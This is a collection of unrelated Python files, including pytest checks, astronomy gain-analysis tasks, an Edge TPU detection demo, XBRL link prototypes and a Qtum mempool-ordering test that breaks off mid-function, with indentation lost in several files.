from .. import products
test_paths = {"/": {"tests_path": join(dirname(__file__), "..", "..", "..", "..")}} # repo root
environment.do_delayed_imports(None, test_paths)
@active_products("product")
def test_load_active_product(product):
"""test we can successfully load the product of the current testenv"""
products.Product({}, product)
# test passes if it doesn't throw
@all_products("product")
def test_load_all_products(product):
"""test every product either loads or throws ImportError"""
try:
products.Product({}, product)
except ImportError:
pass
@active_products("product", marks={
"sauce": pytest.mark.skip("needs env extras kwargs"),
})
def test_server_start_config(product):
product_data = products.Product({}, product)
env_extras = product_data.get_env_extras()
with mock.patch.object(environment.serve, "start") as start:
with environment.TestEnvironment(test_paths,
1,
False,
False,
None,
product_data.env_options,
{"type": "none"},
env_extras):
start.assert_called_once()
args = start.call_args
config = args[0][1]
if "server_host" in product_data.env_options:
assert config["server_host"] == product_data.env_options["server_host"]
else:
assert config["server_host"] == config["browser_host"]
assert isinstance(config["bind_address"], bool)
|
py | 1a38c00fd21fb41f3c2a440f12be81e54b6d5fe7 | def valid_parentheses(string):
    # Keep only the parenthesis characters; everything else is ignored.
    result = [char for char in string if char in "()"]
    comp = -1
    total = len(result)
    # An odd number of parentheses can never balance.
    if total % 2 == 1:
        return False
    index = 0
    while True:
        if total == 0:
            return True
        if index >= total - 1:
            # A full pass is done: restart from the beginning. If no pair
            # was removed during the pass, the remainder can never balance.
            index = 0
            total = len(result)
            if comp == total:
                return False
            comp = total
        # Delete an innermost "()" pair and shrink the working list.
        if result[index + 1] == ")" and result[index] == "(":
            del result[index:index + 2]
            total -= 2
        index += 1 |
py | 1a38c0c29ab34f447c75c9e8aad15de412190e3d | from typing import Any, Dict, List, Set
import random
from mdp import MarkovDecisionProcedure
class RandomPolicy:
def __init__(self):
self._actions_for_state: Dict[Any, List[Any]] = dict()
def suggest_action_for_state(self, state):
choices = self._actions_for_state[state]
if len(choices) > 0:
return random.choice(choices)
else:
# ... in a terminal state
return None
def is_new_state(self, state) -> bool:
return not state in self._actions_for_state
def initialize_state(self, state, available_actions: Set):
self._actions_for_state[state] = list(available_actions)
def initialize_new_episode(self):
# Nothing to prepare in this policy
pass
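
# Usage sketch (the state object and the available-actions source are
# illustrative, not part of this module):
# policy = RandomPolicy()
# if policy.is_new_state(state):
#     policy.initialize_state(state, mdp.available_actions_for(state))
# action = policy.suggest_action_for_state(state)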
|
py | 1a38c1876cfc5543f1aecd6ecf57bfa460d9f598 | from setuptools import setup, find_packages
setup(
name='traj_restapi',
version='1.0.0',
description='RESTful API for trajectory information.',
url='https://github.com/Stuartlab-UCSC/traj-restapi',
author='Duncan McColl',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
keywords='rest restful api flask swagger openapi flask-restplus',
packages=find_packages(),
install_requires=['flask-restplus==0.9.2', 'Flask-SQLAlchemy==2.1'],
)
|
py | 1a38c1f4aa43a4e850c14047dba0dd7d64eabcde | """Class to analyze the gains from fe55 cluster fitting"""
import numpy as np
from lsst.eotest.sensor import Fe55GainFitter
from lsst.eo_utils.base.defaults import ALL_SLOTS
from lsst.eo_utils.base.config_utils import EOUtilOptions
from lsst.eo_utils.base.data_utils import TableDict, vstack_tables
from lsst.eo_utils.base.factory import EO_TASK_FACTORY
from lsst.eo_utils.fe55.meta_analysis import Fe55RaftTableAnalysisConfig,\
Fe55RaftTableAnalysisTask,\
Fe55SummaryAnalysisConfig, Fe55SummaryAnalysisTask
class Fe55GainStatsConfig(Fe55RaftTableAnalysisConfig):
"""Configuration for Fe55GainStatsTask"""
infilekey = EOUtilOptions.clone_param('infilekey', default='fe55-clusters')
filekey = EOUtilOptions.clone_param('filekey', default='fe55-gain-stats')
use_all = EOUtilOptions.clone_param('use_all')
class Fe55GainStatsTask(Fe55RaftTableAnalysisTask):
"""Analyze the gains using the fe55 cluster fit results"""
ConfigClass = Fe55GainStatsConfig
_DefaultName = "Fe55GainStatsTask"
plot_names = ['gain']
def extract(self, butler, data, **kwargs):
"""Extract the gains and widths from the f355 clusters
Parameters
----------
butler : `Butler`
The data butler
data : `dict`
Dictionary (or other structure) contain the input data
kwargs
Used to override default configuration
Returns
-------
dtables : `TableDict`
The resulting data
"""
self.safe_update(**kwargs)
if butler is not None:
self.log.warn("Ignoring butler")
use_all = self.config.use_all
data_dict = dict(kalpha_peak=[],
kalpha_sigma=[],
ncluster=[],
ngood=[],
gain=[],
gain_error=[],
fit_xmin=[],
fit_xmax=[],
fit_pars=[],
fit_nbins=[],
sigmax_median=[],
sigmay_median=[],
slot=[],
amp=[])
self.log_info_raft_msg(self.config, "")
for islot, slot in enumerate(ALL_SLOTS):
self.log_progress(" %s" % slot)
basename = data[slot]
dtables = TableDict(basename)
for amp in range(16):
table = dtables['amp%02i' % (amp+1)]
if use_all:
mask = np.ones((len(table)), bool)
else:
mask = (np.fabs(table['XPOS'] - table['XPEAK']) < 1)*\
(np.fabs(table['YPOS'] - table['YPEAK']) < 1)
tablevals = table[mask]['DN']
gainfitter = Fe55GainFitter(tablevals)
try:
kalpha_peak, kalpha_sigma = gainfitter.fit(bins=100)
gain = gainfitter.gain
gain_error = gainfitter.gain_error
pars = gainfitter.pars
except Exception:
kalpha_peak, kalpha_sigma = (np.nan, np.nan)
gain = np.nan
gain_error = np.nan
pars = np.nan * np.ones((4))
data_dict['kalpha_peak'].append(kalpha_peak)
data_dict['kalpha_sigma'].append(kalpha_sigma)
data_dict['gain'].append(gain)
data_dict['gain_error'].append(gain_error)
xra = gainfitter.xrange
data_dict['ncluster'].append(mask.size)
data_dict['ngood'].append(mask.sum())
if xra is None:
data_dict['fit_xmin'].append(np.nan)
data_dict['fit_xmax'].append(np.nan)
else:
data_dict['fit_xmin'].append(xra[0])
data_dict['fit_xmax'].append(xra[1])
data_dict['fit_pars'].append(pars)
data_dict['fit_nbins'].append(100.)
data_dict['sigmax_median'].append(np.median(table['SIGMAX']))
data_dict['sigmay_median'].append(np.median(table['SIGMAY']))
data_dict['slot'].append(islot)
data_dict['amp'].append(amp)
self.log_progress("Done!")
outtables = TableDict()
outtables.make_datatable("fe55_gain_stats", data_dict)
return outtables
def plot(self, dtables, figs, **kwargs):
"""Plot the gain results from the fe55 study
It should use a `TableDict` object to create a set of
plots and fill a `FigureDict` object
Parameters
----------
dtables : `TableDict`
The data produced by this task
figs : `FigureDict`
The resulting figures
kwargs
Used to override default configuration
"""
self.safe_update(**kwargs)
sumtable = dtables['fe55_gain_stats']
figs.plot_stat_color('gain', sumtable['gain'].reshape(9, 16))
class Fe55GainSummaryConfig(Fe55SummaryAnalysisConfig):
"""Configuration for Fe55GainSummaryTask"""
infilekey = EOUtilOptions.clone_param('infilekey', default='fe55-gain-stats')
filekey = EOUtilOptions.clone_param('filekey', default='fe55-gain-sum')
use_all = EOUtilOptions.clone_param('use_all')
class Fe55GainSummaryTask(Fe55SummaryAnalysisTask):
"""Sumarize the results of the Fe55 gain analyses"""
ConfigClass = Fe55GainSummaryConfig
_DefaultName = "Fe55GainSummaryTask"
plot_names = ['gain', 'sigmax', 'fgood']
def extract(self, butler, data, **kwargs):
"""Make a summry table of the fe55 data
Parameters
----------
butler : `Butler`
The data butler
data : `dict`
            Dictionary (or other structure) containing the input data
kwargs
Used to override default configuration
Returns
-------
dtables : `TableDict`
The resulting data
"""
self.safe_update(**kwargs)
if butler is not None:
self.log.warn("Ignoring butler")
for key, val in data.items():
data[key] = val.replace('_fe55-gain-sum.fits', '_fe55-gain-stats.fits')
remove_cols = ['fit_pars']
if not self.config.skip:
outtable = vstack_tables(data, tablename='fe55_gain_stats',
remove_cols=remove_cols)
dtables = TableDict()
dtables.add_datatable('fe55_gain_sum', outtable)
dtables.make_datatable('runs', dict(runs=sorted(data.keys())))
return dtables
def plot(self, dtables, figs, **kwargs):
"""Plot the summary data from the fe55 study
Parameters
----------
dtables : `TableDict`
The data produced by this task
figs : `FigureDict`
The resulting figures
kwargs
Used to override default configuration
"""
self.safe_update(**kwargs)
sumtable = dtables['fe55_gain_sum']
runtable = dtables['runs']
yvals = sumtable['gain'].flatten().clip(0., 2.)
yerrs = sumtable['gain_error'].flatten().clip(0., 0.5)
runs = runtable['runs']
figs.plot_run_chart("gain", runs, yvals, yerrs=yerrs, ylabel="Gain")
yvals = sumtable['sigmax_median'].flatten().clip(0., 2.)
figs.plot_run_chart("sigmax", runs, yvals, ylabel="Cluster width [pixels]")
yvals = sumtable['ngood']/sumtable['ncluster']
figs.plot_run_chart("fgood", runs, yvals, ylabel="Fraction of good clusters")
EO_TASK_FACTORY.add_task_class('Fe55GainStats', Fe55GainStatsTask)
EO_TASK_FACTORY.add_task_class('Fe55GainSummary', Fe55GainSummaryTask)
|
py | 1a38c2c00e941267d3d484ce416535f281d0d3d1 | import os
import shutil
N = 6
data_root = "/media/data/umutlu/AIC20_track4/"
original_image_folder = data_root + "test_ori_images/"
subset_folder = data_root + "subset_test_ori_images/"
for i in range(1, 101):
org_video_folder = original_image_folder + str(i) + "/"
subset_video_folder = subset_folder + str(i) + "/"
os.makedirs(subset_video_folder, exist_ok=True)
files = os.listdir(org_video_folder)
    # Copy every Nth frame; frames are assumed to be named 1.jpg, 2.jpg, ...
    for f in range(1, len(files), N):
        shutil.copyfile(org_video_folder + str(f) + ".jpg",
                        subset_video_folder + str(f) + ".jpg")
print("Video " + str(i) + " is done.")
|
py | 1a38c2e1540c82d15c306d2c3f0b34a35521e8f8 |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A demo which runs object detection on camera frames.
export TEST_DATA=/usr/lib/python3/dist-packages/edgetpu/test_data
Run face detection model:
python3 -m edgetpuvision.detect \
--model ${TEST_DATA}/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite
Run coco model:
python3 -m edgetpuvision.detect \
--model ${TEST_DATA}/mobilenet_ssd_v2_coco_quant_postprocess_edgetpu.tflite \
--labels ${TEST_DATA}/coco_labels.txt
"""
import argparse
import collections
import colorsys
import itertools
import time
from pytz import utc,timezone
import firebase_admin
from firebase_admin import credentials
from firebase_admin import firestore
import datetime
from edgetpu.detection.engine import DetectionEngine
from . import svg
from . import utils
from .apps import run_app
CSS_STYLES = str(svg.CssStyle({'.back': svg.Style(fill='black',
stroke='black',
stroke_width='0.5em'),
'.bbox': svg.Style(fill_opacity=0.0,
stroke_width='0.1em')}))
BBox = collections.namedtuple('BBox', ('x', 'y', 'w', 'h'))
BBox.area = lambda self: self.w * self.h
BBox.scale = lambda self, sx, sy: BBox(x=self.x * sx, y=self.y * sy,
w=self.w * sx, h=self.h * sy)
BBox.__str__ = lambda self: 'BBox(x=%.2f y=%.2f w=%.2f h=%.2f)' % self
Object = collections.namedtuple('Object', ('id', 'label', 'score', 'bbox'))
Object.__str__ = lambda self: 'Object(id=%d, label=%s, score=%.2f, %s)' % self
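# Illustrative example (not from the original demo): scale a normalized box to
# a 1280x720 frame and read back its area.
#   box = BBox(x=0.1, y=0.2, w=0.5, h=0.4)
#   box.scale(1280, 720)  # -> BBox(x=128.00 y=144.00 w=640.00 h=288.00)
#   box.area()            # -> 0.2 (in normalized units)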
#cred = credentials.Certificate('/usr/lib/python3/dist-packages/edgetpuvision/serviceAccount.json')
#firebase_admin.initialize_app(cred)
#db = firestore.client()
def size_em(length):
return '%sem' % str(0.6 * (length + 1))
def color(i, total):
return tuple(int(255.0 * c) for c in colorsys.hsv_to_rgb(i / total, 1.0, 1.0))
def make_palette(keys):
return {key : svg.rgb(color(i, len(keys))) for i, key in enumerate(keys)}
def make_get_color(color, labels):
if color:
return lambda obj_id: color
if labels:
palette = make_palette(labels.keys())
return lambda obj_id: palette[obj_id]
return lambda obj_id: 'white'
def overlay(title, objs, get_color, inference_time, inference_rate, layout):
x0, y0, width, height = layout.window
font_size = 0.03 * height
defs = svg.Defs()
defs += CSS_STYLES
doc = svg.Svg(width=width, height=height,
viewBox='%s %s %s %s' % layout.window,
font_size=font_size, font_family='monospace', font_weight=500)
doc += defs
for obj in objs:
percent = int(100 * obj.score)
if obj.label:
caption = '%d%% %s' % (percent, obj.label)
else:
caption = '%d%%' % percent
x, y, w, h = obj.bbox.scale(*layout.size)
color = get_color(obj.id)
doc += svg.Rect(x=x, y=y, width=w, height=h,
style='stroke:%s' % color, _class='bbox')
        doc += svg.Rect(x=x, y=y+h,
width=size_em(len(caption)), height='1.2em', fill=color)
t = svg.Text(x=x, y=y+h, fill='black')
t += svg.TSpan(caption, dy='1em')
doc += t
ox = x0 + 20
oy1, oy2 = y0 + 20 + font_size, y0 + height - 20
# Title
if title:
doc += svg.Rect(x=0, y=0, width=size_em(len(title)), height='1em',
transform='translate(%s, %s) scale(1,-1)' % (ox, oy1), _class='back')
doc += svg.Text(title, x=ox, y=oy1, fill='white')
# Info
lines = [
'Objects: %d' % len(objs),
'Inference time: %.2f ms (%.2f fps)' % (inference_time * 1000, 1.0 / inference_time)
]
for i, line in enumerate(reversed(lines)):
y = oy2 - i * 1.7 * font_size
doc += svg.Rect(x=0, y=0, width=size_em(len(line)), height='1em',
transform='translate(%s, %s) scale(1,-1)' % (ox, y), _class='back')
doc += svg.Text(line, x=ox, y=y, fill='white')
return str(doc)
def convert(obj, labels):
x0, y0, x1, y1 = obj.bounding_box.flatten().tolist()
return Object(id=obj.label_id,
label=labels[obj.label_id] if labels else None,
score=obj.score,
bbox=BBox(x=x0, y=y0, w=x1 - x0, h=y1 - y0))
def print_results(inference_rate, objs):
print('\nInference (rate=%.2f fps):' % inference_rate)
for i, obj in enumerate(objs):
print(' %d: %s, area=%.2f' % (i, obj, obj.bbox.area()))
def render_gen(args):
fps_counter = utils.avg_fps_counter(30)
engines, titles = utils.make_engines(args.model, DetectionEngine)
assert utils.same_input_image_sizes(engines)
engines = itertools.cycle(engines)
engine = next(engines)
labels = utils.load_labels(args.labels) if args.labels else None
filtered_labels = set(l.strip() for l in args.filter.split(',')) if args.filter else None
get_color = make_get_color(args.color, labels)
draw_overlay = True
yield utils.input_image_size(engine)
output = None
while True:
tensor, layout, command = (yield output)
inference_rate = next(fps_counter)
if draw_overlay:
start = time.monotonic()
            objs = engine.detect_with_input_tensor(tensor, threshold=args.threshold, top_k=args.top_k)
inference_time = time.monotonic() - start
objs = [convert(obj, labels) for obj in objs]
#objx,objy = [convert_xy(obj) for obj in objs]
if labels and filtered_labels:
objs = [obj for obj in objs if obj.label in filtered_labels]
objs = [obj for obj in objs if args.min_area <= obj.bbox.area() <= args.max_area]
if args.print:
print_results(inference_rate, objs)
#if objs:
# string = ""
# string_id = ""
# for i in range(len(objs)):
# socre = objs[i][2]
# if socre > 0.5:
# objid = objs[i][0]
# objx = objs[i][3][0]
# objy = objs[i][3][1]
# objw = objs[i][3][2]
# objh = objs[i][3][3]
# x = ((objx+objx+objw)/2)*1280
# y = ((objy+objy+objh)/2)*720
# if i == (len(objs)-1):
# string = string+(str(round(x,3))+","+str(round(y,3)))
# string_id = string_id+(str(objid)+" ")
# else:
# string = string+(str(round(x,3))+","+str(round(y,3))+" ")
# string_id = string_id+(str(objid)+" ")
# if string:
# now = datetime.datetime.now()
# thistime = now.strftime('%H%M%S%f')[:-3]
# print(now.strftime('%H%M%S%f')[:-3])
# print(string)
# print(string_id)
# doc = {
# 'label':string_id,
# 'positsion':string,
# 'timeid':thistime
# }
# doc_ref = db.collection("time").document(thistime)
# doc_ref.set(doc)
title = titles[engine]
output = overlay(title, objs, get_color, inference_time, inference_rate, layout)
else:
output = None
if command == 'o':
draw_overlay = not draw_overlay
elif command == 'n':
engine = next(engines)
def add_render_gen_args(parser):
parser.add_argument('--model',
help='.tflite model path', required=True)
parser.add_argument('--labels',
help='labels file path')
parser.add_argument('--top_k', type=int, default=50,
help='Max number of objects to detect')
parser.add_argument('--threshold', type=float, default=0.1,
help='Detection threshold')
parser.add_argument('--min_area', type=float, default=0.0,
help='Min bounding box area')
parser.add_argument('--max_area', type=float, default=1.0,
help='Max bounding box area')
parser.add_argument('--filter', default=None,
help='Comma-separated list of allowed labels')
parser.add_argument('--color', default=None,
                        help='Bounding box display color')
parser.add_argument('--print', default=False, action='store_true',
help='Print inference results')
def main():
run_app(add_render_gen_args, render_gen)
if __name__ == '__main__':
main()
|
py | 1a38c4550758e90fcf61290d64f1a0db82a9c099 | from arelle import XmlUtil, XbrlConst
from arelle.ModelValue import QName
from arelle.XmlValidate import VALID
from collections import defaultdict
import decimal, os
ModelDocument = None

# isinstance checks below use _STR_BASE; in arelle this is normally provided by
# PythonUtil (str on Python 3). Defined here so this module is self-contained.
_STR_BASE = str
class LinkPrototype(): # behaves like a ModelLink for relationship prototyping
def __init__(self, modelDocument, parent, qname, role):
self.modelDocument = modelDocument
self._parent = parent
self.modelXbrl = modelDocument.modelXbrl
self.qname = self.elementQname = qname
self.role = role
# children are arc and loc elements or prototypes
self.childElements = []
self.text = self.textValue = None
self.attributes = {"{http://www.w3.org/1999/xlink}type":"extended"}
if role:
self.attributes["{http://www.w3.org/1999/xlink}role"] = role
self.labeledResources = defaultdict(list)
def clear(self):
self.__dict__.clear() # dereference here, not an lxml object, don't use superclass clear()
def __iter__(self):
return iter(self.childElements)
def getparent(self):
return self._parent
def iterchildren(self):
return iter(self.childElements)
def get(self, key, default=None):
return self.attributes.get(key, default)
    def __getitem__(self, key):
        return self.attributes[key]
class LocPrototype():
def __init__(self, modelDocument, parent, label, locObject, role=None):
self.modelDocument = modelDocument
self._parent = parent
self.modelXbrl = modelDocument.modelXbrl
self.qname = self.elementQname = XbrlConst.qnLinkLoc
self.text = self.textValue = None
# children are arc and loc elements or prototypes
self.attributes = {"{http://www.w3.org/1999/xlink}type":"locator",
"{http://www.w3.org/1999/xlink}label":label}
# add an href if it is a 1.1 id
if isinstance(locObject,_STR_BASE): # it is an id
self.attributes["{http://www.w3.org/1999/xlink}href"] = "#" + locObject
if role:
self.attributes["{http://www.w3.org/1999/xlink}role"] = role
self.locObject = locObject
def clear(self):
self.__dict__.clear() # dereference here, not an lxml object, don't use superclass clear()
@property
def xlinkLabel(self):
return self.attributes.get("{http://www.w3.org/1999/xlink}label")
def dereference(self):
if isinstance(self.locObject,_STR_BASE): # dereference by ID
return self.modelDocument.idObjects[self.locObject]
else: # it's an object pointer
return self.locObject
def getparent(self):
return self._parent
def get(self, key, default=None):
return self.attributes.get(key, default)
    def __getitem__(self, key):
        return self.attributes[key]
class ArcPrototype():
def __init__(self, modelDocument, parent, qname, fromLabel, toLabel, linkrole, arcrole, order="1"):
self.modelDocument = modelDocument
self._parent = parent
self.modelXbrl = modelDocument.modelXbrl
self.qname = self.elementQname = qname
self.linkrole = linkrole
self.arcrole = arcrole
self.order = order
self.text = self.textValue = None
# children are arc and loc elements or prototypes
self.attributes = {"{http://www.w3.org/1999/xlink}type":"arc",
"{http://www.w3.org/1999/xlink}from": fromLabel,
"{http://www.w3.org/1999/xlink}to": toLabel,
"{http://www.w3.org/1999/xlink}arcrole": arcrole}
# must look validated (because it can't really be validated)
self.xValid = VALID
self.xValue = self.sValue = None
self.xAttributes = {}
@property
def orderDecimal(self):
return decimal.Decimal(self.order)
def clear(self):
self.__dict__.clear() # dereference here, not an lxml object, don't use superclass clear()
def getparent(self):
return self._parent
def get(self, key, default=None):
return self.attributes.get(key, default)
def items(self):
return self.attributes.items()
    def __getitem__(self, key):
        return self.attributes[key]
class DocumentPrototype():
def __init__(self, modelXbrl, uri, base=None, referringElement=None, isEntry=False, isDiscovered=False, isIncluded=None, namespace=None, reloadCache=False, **kwargs):
global ModelDocument
if ModelDocument is None:
from arelle import ModelDocument
self.modelXbrl = modelXbrl
self.skipDTS = modelXbrl.skipDTS
self.modelDocument = self
if referringElement is not None:
if referringElement.localName == "schemaRef":
self.type = ModelDocument.Type.SCHEMA
elif referringElement.localName == "linkbaseRef":
self.type = ModelDocument.Type.LINKBASE
else:
self.type = ModelDocument.Type.UnknownXML
else:
self.type = ModelDocument.Type.UnknownXML
normalizedUri = modelXbrl.modelManager.cntlr.webCache.normalizeUrl(uri, base)
self.filepath = modelXbrl.modelManager.cntlr.webCache.getfilename(normalizedUri, filenameOnly=True)
self.uri = modelXbrl.modelManager.cntlr.webCache.normalizeUrl(self.filepath)
self.basename = os.path.basename(self.filepath)
self.targetNamespace = None
self.referencesDocument = {}
self.hrefObjects = []
self.schemaLocationElements = set()
self.referencedNamespaces = set()
self.inDTS = False
self.xmlRootElement = None
def clear(self):
self.__dict__.clear() # dereference here, not an lxml object, don't use superclass clear()
|
py | 1a38c49c56dbe4b6f1ad211cf2d95a703b03c933 | #!/usr/bin/env python3
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
from test_framework.address import *
from test_framework.qtum import *
import sys
import random
import time
class QtumTransactionPrioritizationTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 1
def setup_network(self, split=False):
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir, [['-staking=1', '-rpcmaxgasprice=10000000']])
self.is_network_split = False
self.node = self.nodes[0]
def restart_node(self):
stop_nodes(self.nodes)
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir, [['-staking=1', '-rpcmaxgasprice=10000000']])
self.node = self.nodes[0]
def stake_or_mine(self, old_block_count=None, use_staking=False):
# Since staking is switched on by default, if a block has been staked return that block's hash
if self.node.getblockcount() > old_block_count:
return self.node.getbestblockhash()
if use_staking:
if not old_block_count:
old_block_count = self.node.getblockcount()
while old_block_count == self.node.getblockcount():
time.sleep(0.1)
return self.node.getbestblockhash()
else:
return self.node.generate(1)[0]
def send_transaction_with_fee(self, fee):
for unspent in self.node.listunspent():
if unspent['amount'] >= 10000:
break
addr = self.node.getnewaddress()
haddr = p2pkh_to_hex_hash(addr)
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(unspent['txid'], 16), unspent['vout']), nSequence=0)]
amount = int((float(str(unspent['amount'])) - fee)*COIN)
tx.vout = [CTxOut(amount, scriptPubKey=CScript([OP_DUP, OP_HASH160, hex_str_to_bytes(haddr), OP_EQUALVERIFY, OP_CHECKSIG]))]
tx_hex_signed = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
return self.node.sendrawtransaction(tx_hex_signed)
    # Creates an op_call tx that calls the fallback function of the only contract that should be in existence
def send_op_call_transaction_with_gas_price(self, contract_address, gas_price, spends_txid=None, spends_vout=None):
gas_limit = 1000000
if not spends_txid:
unspent = self.node.listunspent()[0]
spends_txid = unspent['txid']
spends_vout = unspent['vout']
# Fetch the amount of the vout of the txid that we are spending
spends_tx = self.node.getrawtransaction(spends_txid, True)
for output in spends_tx['vout']:
if output['n'] == spends_vout:
break
else:
# That output does not exist...
assert(False)
addr = self.node.getnewaddress()
haddr = p2pkh_to_hex_hash(addr)
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(spends_txid, 16), spends_vout), nSequence=0)]
tx.vout.append(CTxOut(0, scriptPubKey=CScript([b"\x04", CScriptNum(gas_limit), CScriptNum(int(gas_price*COIN)), b"\x00", hex_str_to_bytes(contract_address), OP_CALL])))
change = int((float(str(output['value'])) - gas_price*gas_limit) * COIN)
tx.vout.append(CTxOut(change, scriptPubKey=CScript([OP_DUP, OP_HASH160, hex_str_to_bytes(haddr), OP_EQUALVERIFY, OP_CHECKSIG])))
tx_hex_signed = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
return self.node.sendrawtransaction(tx_hex_signed)
def send_op_call_outputs_with_gas_price(self, contract_address, gas_prices, spends_txid=None, spends_vout=None):
gas_limit = 100000
if not spends_txid:
for unspent in self.node.listunspent():
if unspent['amount'] == 20000:
spends_txid = unspent['txid']
spends_vout = unspent['vout']
break
# Fetch the amount of the vout of the txid that we are spending
spends_tx = self.node.getrawtransaction(spends_txid, True)
for output in spends_tx['vout']:
if output['n'] == spends_vout:
break
else:
# That output does not exist...
assert(False)
addr = self.node.getnewaddress()
haddr = p2pkh_to_hex_hash(addr)
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(spends_txid, 16), spends_vout), nSequence=0)]
for gas_price in gas_prices:
tx.vout.append(CTxOut(0, scriptPubKey=CScript([b"\x04", CScriptNum(gas_limit), CScriptNum(int(gas_price*COIN)), b"\x00", hex_str_to_bytes(contract_address), OP_CALL])))
change = int((float(str(output['value'])) - sum(gas_prices)*gas_limit) * COIN)
tx.vout.append(CTxOut(change, scriptPubKey=CScript([OP_DUP, OP_HASH160, hex_str_to_bytes(haddr), OP_EQUALVERIFY, OP_CHECKSIG])))
tx_hex_signed = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
return self.node.sendrawtransaction(tx_hex_signed)
def verify_contract_txs_are_added_last_test(self, with_restart=False, use_staking=False):
# Set the fee really high so that it should normally be added first if we only looked at the fee/size
contract_txid = self.node.createcontract("00", 4*10**6, 0.0001)['txid']
normal_txid = self.node.sendtoaddress(self.node.getnewaddress(), 1)
old_block_count = self.node.getblockcount()
if with_restart:
self.restart_node()
block_hash = self.stake_or_mine(old_block_count=old_block_count, use_staking=use_staking)
block_txs = self.node.getblock(block_hash)['tx']
if use_staking:
block_txs.pop(1) # Ignore the coinstake tx so we can reuse the tests for both pow and pos
assert_equal(len(block_txs), 3)
assert_equal(block_txs.index(normal_txid), 1)
assert_equal(block_txs.index(contract_txid), 2)
# Verifies that contract transactions are correctly ordered by descending (minimum among outputs) gas price and ascending size
# Sends 7 txs in total
def verify_contract_txs_internal_order_test(self, with_restart=False, use_staking=False):
contract_address = list(self.node.listcontracts().keys())[0]
sender = self.node.getnewaddress()
tx4 = self.send_op_call_outputs_with_gas_price(contract_address, [0.0001])
tx5 = self.send_op_call_outputs_with_gas_price(contract_address, [0.0001, 0.0001])
tx3 = self.send_op_call_outputs_with_gas_price(contract_address, [0.00010001])
tx6 = self.send_op_call_outputs_with_gas_price(contract_address, [0.0001, 0.00010001, 0.00010001])
tx2 = self.send_op_call_outputs_with_gas_price(contract_address, [0.002])
tx1 = self.node.sendtoaddress(sender, 1)
tx7 = self.node.sendtocontract(contract_address, "00", 0, 100000, "0.000001", sender)['txid']
old_block_count = self.node.getblockcount()
if with_restart:
self.restart_node()
        # Ordering based on gas price should now be tx1 through tx7
block_hash = self.stake_or_mine(old_block_count=old_block_count, use_staking=use_staking)
block = self.node.getblock(block_hash)
block_txs = block['tx']
if use_staking:
block_txs.pop(1) # Ignore the coinstake tx so we can reuse the tests for both pow and pos
assert_equal(block_txs[1:], [tx1, tx2, tx3, tx4, tx5, tx6, tx7])
    # In the case of an ancestor chain in the mempool, such that a contract tx spends another normal tx that is in the mempool,
    # the contract tx should still be added last while the tx it spends should be added based on its fee ordering.
    # In this test we create 4 txs:
    # 1. a normal tx with a fee > tx2 and tx3
    # 2. an ancestor normal tx that will be spent by the contract tx, with a fee < tx1 and > tx3
    # 3. a normal tx with a fee < tx1 and tx2
    # 4. an op_call contract tx spending tx2.
    # Expected transaction ordering in the block should thus be tx1, tx2, tx3, tx4
def verify_ancestor_chain_with_contract_txs_test(self, with_restart=False, use_staking=False):
contract_address = list(self.node.listcontracts().keys())[0]
tx1 = self.send_transaction_with_fee(0.01)
tx2 = self.send_transaction_with_fee(0.005)
tx3 = self.send_transaction_with_fee(0.001)
        # Create a contract tx (4) that spends tx2
tx4 = self.send_op_call_transaction_with_gas_price(contract_address, 0.001, spends_txid=tx2, spends_vout=0)
# Make sure that all txs are in the mempool
assert_equal(len(self.node.getrawmempool()), 4)
old_block_count = self.node.getblockcount()
if with_restart:
self.restart_node()
block_hash = self.stake_or_mine(old_block_count=old_block_count, use_staking=use_staking)
block_txs = self.node.getblock(block_hash)['tx']
if use_staking:
block_txs.pop(1) # Ignore the coinstake tx so we can reuse the tests for both pow and pos
assert_equal(len(block_txs), 5)
assert_equal(block_txs[1], tx1)
assert_equal(block_txs[2], tx2)
assert_equal(block_txs[3], tx3)
assert_equal(block_txs[4], tx4)
# Creates two different contract tx chains.
def verify_contract_ancestor_txs_test(self, with_restart=False, use_staking=False):
contract_address = list(self.node.listcontracts().keys())[0]
for unspent in self.node.listunspent():
if unspent['amount'] > 10000:
break
address = self.node.getnewaddress()
expected_tx_order = []
for (expected_tx_index, gas_price) in [(1, 60), (2, 50), (7, 40), (8, 50)]:
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(unspent['txid'], 16), unspent['vout']), nSequence=0)]
tx.vout = [
CTxOut(0, scriptPubKey=CScript([b"\x04", CScriptNum(30000), CScriptNum(gas_price), b"\x00", hex_str_to_bytes(contract_address), OP_CALL])),
CTxOut(int((unspent['amount'] - Decimal('0.1'))*COIN), scriptPubKey=CScript([OP_DUP, OP_HASH160, hex_str_to_bytes(p2pkh_to_hex_hash(address)), OP_EQUALVERIFY, OP_CHECKSIG]))
]
tx_raw = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
# Make the next vin refer to this tx.
unspent['amount'] -= Decimal('0.1')
unspent['txid'] = self.node.sendrawtransaction(tx_raw)
unspent['vout'] = 1
expected_tx_order.append((expected_tx_index, unspent['txid']))
for unspent in self.node.listunspent():
if unspent['amount'] == 20000 and unspent['address'] != address:
break
# The list of tuples specifies (expected position in block txs, gas_price)
